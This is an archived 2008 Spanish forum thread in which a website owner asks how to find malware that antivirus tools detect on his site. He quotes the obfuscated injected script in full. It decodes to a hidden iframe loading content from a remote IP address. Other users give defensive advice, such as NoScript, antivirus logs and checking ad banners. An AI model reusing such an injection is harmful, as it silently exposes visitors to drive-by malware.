Foros del Web

Foros del Web (http://www.forosdelweb.com/)
-   Virus, troyanos y spyware (http://www.forosdelweb.com/f66/)
-   -   Escanear pagina web? (http://www.forosdelweb.com/f66/escanear-pagina-web-584602/)

elias77 09/05/2008 07:55
Escanear pagina web?
 
Holas, lo que necesito basicamente es poder escaner una pagina web (on-line) que yo mismo diseñe, creo que se me metio algun tipo de virus o troyano. No encontre ningun antivirus o antispyware que me deje hacer esto, y quisiera saber hay alguno que lo haga para asi poder detectar donde esta el virus o que tipo de virus es. ya que cuando entran algunos de los clientes, su antivirus (mas que nada nod) les detecta que la web tiene virus. A mi tambien me lo detecto pero no me dice donde se encuentra o algun tipo de informacion para identificarlo.

Pd: en el titulo quise poder "escanear", no escaner, pero ya no me deja modificar el titulo

Gpastor 09/05/2008 14:18
Re: Escanear pagina web?
 
Hola, el analizador de páginas web que conozco es Site Advisor sería cuestión de que ingreses la URL de tu página y en cierto tiempo la información estará publicada en la misma página.

Saludos :adios:

Wako 09/05/2008 14:31
Re: Escanear pagina web?
 
Hola Elias, El NOD tiene unos logs donde quizas puedas conseguir más información de que detectó.

También podrías ver el código de tu página a ver si tiene algún tipo de javascript o código "extraño" que no hayas escrito tu.

Puedes utilizar la extensión de Firefox de NoScript para ver que scripts estan corriendo en tu web.

Espero que te sirva

Saludos

elias77 09/05/2008 17:17
Re: Escanear pagina web?
 
Estube revisando el codigo y tengo este script, lo publique en este foro pero no me supieron decir que es exactamente, por lo que leí, creo que provoca un desbordamiendo del buffer. El script es el siguiente:
Cita:
<script>function v4823b8f6da82f(v4823b8f6dac2e){ function v4823b8f6db033 () {return 16;} return(parseInt(v4823b8f6dac2e,v4823b8f6db033())); }function v4823b8f6db820(v4823b8f6dbc1b){ var v4823b8f6dc018='';for(v4823b8f6dc414=0; v4823b8f6dc414<v4823b8f6dbc1b.length; v4823b8f6dc414+=2){ v4823b8f6dc018+=(String.fromCharCode(v4823b8f6da82 f(v4823b8f6dbc1b.substr(v4823b8f6dc414, 2))));}return v4823b8f6dc018;} document.write(v4823b8f6db820('3C5343524950543E776 96E646F772E7374617475733D27446F6E65273B646F63756D6 56E742E777269746528273C696672616D65206E616D653D383 6207372633D5C27687474703A2F2F37372E3232312E3133332 E3135302F2E69662F676F2E68746D6C3F272B4D6174682E726 F756E64284D6174682E72616E646F6D28292A3135303732292 B273636383466326562336262615C272077696474683D33313 4206865696768743D3438207374796C653D5C27646973706C6 1793A206E6F6E655C273E3C2F696672616D653E27293C2F534 3524950543E'));</script>
Este script yo nunca lo subi al sitio, probe subiendo nuevamente el index y, no al instante poro al otro dia volvio a aparecer este maldito script (se ubica debajo de la etiqueta <body> )

Quisiera saber como se puede hacer para sacarlo o si es algun tipo de inyeccion de otro sitio. Me esta volviendo loco.

Wako: quisiera saber como utilizar la extencion NoScript de Firefox, tengo firefox.

Wako 10/05/2008 20:32
Re: Escanear pagina web?
 
Hola elias, simplemente te lo descargas de la pagina de plugins de Firefox lo encuentras aquí

https://addons.mozilla.org/es-ES/firefox/addon/722

Despues te va a aparecer en la barra de abajo (una vez que reinicies el firefox) y te dirá que scripts permite y cuales no de las paginas que visitas. Asi podrías quizas ver de donde viene el script.

Tienes algun banner de publicidad en tu pagina? Recientemente estaban inyectando codigo malicioso en los banner de publicidad.

Revisa si puedes tambien los links entrantes a tu pagina si tienes Cpanel o algun manejador de trafico lo puedes ver. Asi podrías ver desde que páginas tienes entradas sospechosas.

PD: Otra cosa que utilizas la pagina la hiciste toda tu o estas utilizando wordpress o alguna otra plataforma? Si es así busca si hay actualizaciones disponibles...

Espero que te sirva saludos


La zona horaria es GMT -6. Ahora son las 19:53.

Desarrollado por vBulletin® Versión 3.8.7
Derechos de Autor ©2000 - 2026, Jelsoft Enterprises Ltd.